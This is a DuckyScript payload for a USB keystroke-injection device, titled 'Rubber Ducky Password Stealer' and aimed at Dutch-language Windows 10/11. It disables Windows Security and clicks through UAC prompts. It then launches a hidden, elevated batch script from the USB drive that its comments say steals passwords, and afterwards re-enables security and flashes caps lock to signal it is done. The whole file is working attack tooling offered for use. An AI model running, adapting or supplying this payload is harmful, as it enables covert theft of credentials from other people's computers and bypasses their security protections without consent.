REM ###################################################
REM # Title: Rubber Ducky Password Stealer            #
REM # Description: Payload for the Twin Duck firmware #
REM # Target: Windows 10/11 x32/x64 [Dutch]           #
REM # Author: Krouwndouwn                             #
REM # Version: 1.6                                    #
REM ###################################################

REM ----- Open Windows security -----
DELAY 1000
GUI s
DELAY 750
STRING apps: windows-beveiliging
DELAY 500
ENTER

REM ----- Disable Windows security -----
DELAY 1000
ENTER
DELAY 750
TAB
REPEAT 3
DELAY 500
ENTER
DELAY 500
SPACE

REM ----- Pass UAC (administrator) message -----
DELAY 750
ALT j
DELAY 500
ALT F4

REM ----- Run .bat script to steal passwords -----
DELAY 500
GUI r
DELAY 750
STRING powershell -Command Start-Process ((gwmi win32_volume -f 'label=''RDPS''').Name+'rdps.bat') -Verb RunAs -WindowStyle Hidden
DELAY 500
ENTER

REM ----- Pass UAC (administrator) message -----
DELAY 1000
ALT j

REM ----- Pass UAC (administrator) message -----
DELAY 2500
ALT j

REM ----- Wait until everything is executed -----
DELAY 15000

REM ----- Open Windows security -----
GUI s
DELAY 750
STRING apps: windows-beveiliging
DELAY 500
ENTER

REM ----- Enable Windows security -----
DELAY 1000
TAB
DELAY 500
ENTER

REM ----- Pass UAC (administrator) message -----
DELAY 750
ALT j
DELAY 500
ALT F4

REM ----- Flash caps lock light when finished -----
CAPSLOCK
DELAY 100
CAPSLOCK
DELAY 100
CAPSLOCK
DELAY 100
CAPSLOCK